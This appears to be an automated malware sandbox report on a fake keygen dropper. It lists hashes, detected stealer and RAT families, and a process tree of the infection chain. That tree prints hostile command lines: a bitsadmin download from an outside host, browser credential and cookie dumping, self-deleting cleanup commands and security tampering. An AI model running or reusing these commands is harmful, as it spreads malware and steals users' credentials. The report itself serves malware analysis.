Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1803s
  • max time network
    1728s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    04-05-2021 14:36

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Signatures

  • Detected facebook phishing page
  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 62 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 12 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 28 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 35 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 37 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 61 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
    • Drops file in System32 directory
    PID:68
    • C:\Users\Admin\AppData\Roaming\brweadg
      C:\Users\Admin\AppData\Roaming\brweadg
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:2936
    • C:\Users\Admin\AppData\Roaming\hbweadg
      C:\Users\Admin\AppData\Roaming\hbweadg
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:6040
      • C:\Users\Admin\AppData\Roaming\hbweadg
        C:\Users\Admin\AppData\Roaming\hbweadg
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:6404
    • C:\Users\Admin\AppData\Roaming\brweadg
      C:\Users\Admin\AppData\Roaming\brweadg
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:6212
    • C:\Users\Admin\AppData\Roaming\hbweadg
      C:\Users\Admin\AppData\Roaming\hbweadg
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:5864
      • C:\Users\Admin\AppData\Roaming\hbweadg
        C:\Users\Admin\AppData\Roaming\hbweadg
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:5824
    • C:\Users\Admin\AppData\Roaming\brweadg
      C:\Users\Admin\AppData\Roaming\brweadg
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:6976
    • C:\Users\Admin\AppData\Roaming\hbweadg
      C:\Users\Admin\AppData\Roaming\hbweadg
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:1120
      • C:\Users\Admin\AppData\Roaming\hbweadg
        C:\Users\Admin\AppData\Roaming\hbweadg
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:6616
    • C:\Windows\system32\rundll32.exe
      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll",ogdtzM
      2⤵
      • Windows security modification
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      PID:5240
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1096
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1180
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
        1⤵
          PID:1376
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
          1⤵
            PID:340
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1428
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1908
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2576
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                1⤵
                  PID:2608
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                  1⤵
                    PID:2756
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                    1⤵
                      PID:2836
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2852
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:800
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:3828
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:200
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2956
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2208
                        • C:\Users\Admin\AppData\Local\Temp\is-BUE0S.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-BUE0S.tmp\Install.tmp" /SL5="$60068,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:2292
                          • C:\Users\Admin\AppData\Local\Temp\is-4GAN3.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-4GAN3.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3832
                            • C:\Program Files\VideoLAN\BQJZLQSTLY\ultramediaburner.exe
                              "C:\Program Files\VideoLAN\BQJZLQSTLY\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:2284
                              • C:\Users\Admin\AppData\Local\Temp\is-PRGLD.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-PRGLD.tmp\ultramediaburner.tmp" /SL5="$4014E,281924,62464,C:\Program Files\VideoLAN\BQJZLQSTLY\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:3048
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:2244
                            • C:\Users\Admin\AppData\Local\Temp\83-653a9-8cb-01495-3400a06ec1b4d\Laesaefaedisha.exe
                              "C:\Users\Admin\AppData\Local\Temp\83-653a9-8cb-01495-3400a06ec1b4d\Laesaefaedisha.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:936
                            • C:\Users\Admin\AppData\Local\Temp\cf-f846f-b29-d84af-566ea6e402a48\Rugomaevoki.exe
                              "C:\Users\Admin\AppData\Local\Temp\cf-f846f-b29-d84af-566ea6e402a48\Rugomaevoki.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4132
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5mkr0w4q.qnp\KiffMainE1.exe & exit
                                6⤵
                                  PID:4936
                                  • C:\Users\Admin\AppData\Local\Temp\5mkr0w4q.qnp\KiffMainE1.exe
                                    C:\Users\Admin\AppData\Local\Temp\5mkr0w4q.qnp\KiffMainE1.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:6396
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3rpwv5yh.lqa\001.exe & exit
                                  6⤵
                                    PID:6360
                                    • C:\Users\Admin\AppData\Local\Temp\3rpwv5yh.lqa\001.exe
                                      C:\Users\Admin\AppData\Local\Temp\3rpwv5yh.lqa\001.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:6732
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zukvqo2e.2zv\installer.exe /qn CAMPAIGN="654" & exit
                                    6⤵
                                      PID:7024
                                      • C:\Users\Admin\AppData\Local\Temp\zukvqo2e.2zv\installer.exe
                                        C:\Users\Admin\AppData\Local\Temp\zukvqo2e.2zv\installer.exe /qn CAMPAIGN="654"
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Enumerates connected drives
                                        • Modifies system certificate store
                                        • Suspicious use of FindShellTrayWindow
                                        PID:6832
                                        • C:\Windows\SysWOW64\msiexec.exe
                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\zukvqo2e.2zv\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\zukvqo2e.2zv\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619886690 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                          8⤵
                                            PID:4836
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g22ettnt.yxr\gpooe.exe & exit
                                        6⤵
                                          PID:3184
                                          • C:\Users\Admin\AppData\Local\Temp\g22ettnt.yxr\gpooe.exe
                                            C:\Users\Admin\AppData\Local\Temp\g22ettnt.yxr\gpooe.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            PID:5116
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                                PID:5312
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:4432
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:6376
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:7128
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yku2k2ds.3sk\google-game.exe & exit
                                            6⤵
                                              PID:6280
                                              • C:\Users\Admin\AppData\Local\Temp\yku2k2ds.3sk\google-game.exe
                                                C:\Users\Admin\AppData\Local\Temp\yku2k2ds.3sk\google-game.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:6604
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                  8⤵
                                                  • Loads dropped DLL
                                                  PID:6468
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rvxrf3j4.rw1\y1.exe & exit
                                              6⤵
                                                PID:6808
                                                • C:\Users\Admin\AppData\Local\Temp\rvxrf3j4.rw1\y1.exe
                                                  C:\Users\Admin\AppData\Local\Temp\rvxrf3j4.rw1\y1.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:6904
                                                  • C:\Users\Admin\AppData\Local\Temp\KSvAfQ1vFe.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\KSvAfQ1vFe.exe"
                                                    8⤵
                                                      PID:1924
                                                      • C:\Users\Admin\AppData\Roaming\1620146086615.exe
                                                        "C:\Users\Admin\AppData\Roaming\1620146086615.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620146086615.txt"
                                                        9⤵
                                                        • Executes dropped EXE
                                                        PID:5772
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\KSvAfQ1vFe.exe"
                                                        9⤵
                                                          PID:2832
                                                          • C:\Windows\SysWOW64\PING.EXE
                                                            ping 127.0.0.1 -n 3
                                                            10⤵
                                                            • Runs ping.exe
                                                            PID:6032
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\rvxrf3j4.rw1\y1.exe"
                                                        8⤵
                                                          PID:6556
                                                          • C:\Windows\SysWOW64\timeout.exe
                                                            timeout /T 10 /NOBREAK
                                                            9⤵
                                                            • Delays execution with timeout.exe
                                                            PID:5208
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s2qehz1c.rs0\askinstall39.exe & exit
                                                      6⤵
                                                        PID:2208
                                                        • C:\Users\Admin\AppData\Local\Temp\s2qehz1c.rs0\askinstall39.exe
                                                          C:\Users\Admin\AppData\Local\Temp\s2qehz1c.rs0\askinstall39.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:2552
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                            8⤵
                                                              PID:5416
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im chrome.exe
                                                                9⤵
                                                                • Kills process with taskkill
                                                                PID:6776
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kamg2j2w.s3e\setup.exe & exit
                                                          6⤵
                                                            PID:5260
                                                            • C:\Users\Admin\AppData\Local\Temp\kamg2j2w.s3e\setup.exe
                                                              C:\Users\Admin\AppData\Local\Temp\kamg2j2w.s3e\setup.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:5428
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\kamg2j2w.s3e\setup.exe"
                                                                8⤵
                                                                  PID:5944
                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                    ping 1.1.1.1 -n 1 -w 3000
                                                                    9⤵
                                                                    • Runs ping.exe
                                                                    PID:6772
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a0irlaia.13w\request2.exe & exit
                                                              6⤵
                                                                PID:5840
                                                                • C:\Users\Admin\AppData\Local\Temp\a0irlaia.13w\request2.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\a0irlaia.13w\request2.exe
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:3160
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:6844
                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                      parse.exe -f json -b edge
                                                                      9⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:4920
                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                      parse.exe -f json -b chrome
                                                                      9⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:4988
                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                      parse.exe -f json -b firefox
                                                                      9⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:5904
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mqlncqm3.uwn\SunLabsPlayer.exe /S & exit
                                                                6⤵
                                                                  PID:6792
                                                                  • C:\Users\Admin\AppData\Local\Temp\mqlncqm3.uwn\SunLabsPlayer.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\mqlncqm3.uwn\SunLabsPlayer.exe /S
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Drops file in Program Files directory
                                                                    PID:1032
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      PID:5312
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:6992
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:5152
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:5180
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:6880
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:5784
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                • Checks for any installed AV software in registry
                                                                                PID:5600
                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                8⤵
                                                                                • Download via BitsAdmin
                                                                                PID:4588
                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfGNXVQDAS5gsjBB -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                • Drops file in Program Files directory
                                                                                PID:1528
                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pqoEjL4JJuJeAe4u -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:5564
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:6776
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:6184
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:5152
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:6816
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:4540
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            9⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1924
                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll" ogdtzM
                                                                                          8⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:5384
                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll" ogdtzM
                                                                                            9⤵
                                                                                            • Loads dropped DLL
                                                                                            • Drops file in System32 directory
                                                                                            • Modifies system certificate store
                                                                                            PID:6880
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:6332
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:4792
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:6560
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:5612
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf9175.tmp\tempfile.ps1"
                                                                                                  8⤵
                                                                                                    PID:804
                                                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                    8⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Drops file in Program Files directory
                                                                                                    PID:6824
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3gw3fduv.q2g\005.exe & exit
                                                                                                6⤵
                                                                                                  PID:2884
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    7⤵
                                                                                                      PID:6360
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3gw3fduv.q2g\005.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\3gw3fduv.q2g\005.exe
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4820
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vwlbzsjf.5eh\ifhwwyy.exe & exit
                                                                                                    6⤵
                                                                                                      PID:4932
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vwlbzsjf.5eh\ifhwwyy.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\vwlbzsjf.5eh\ifhwwyy.exe
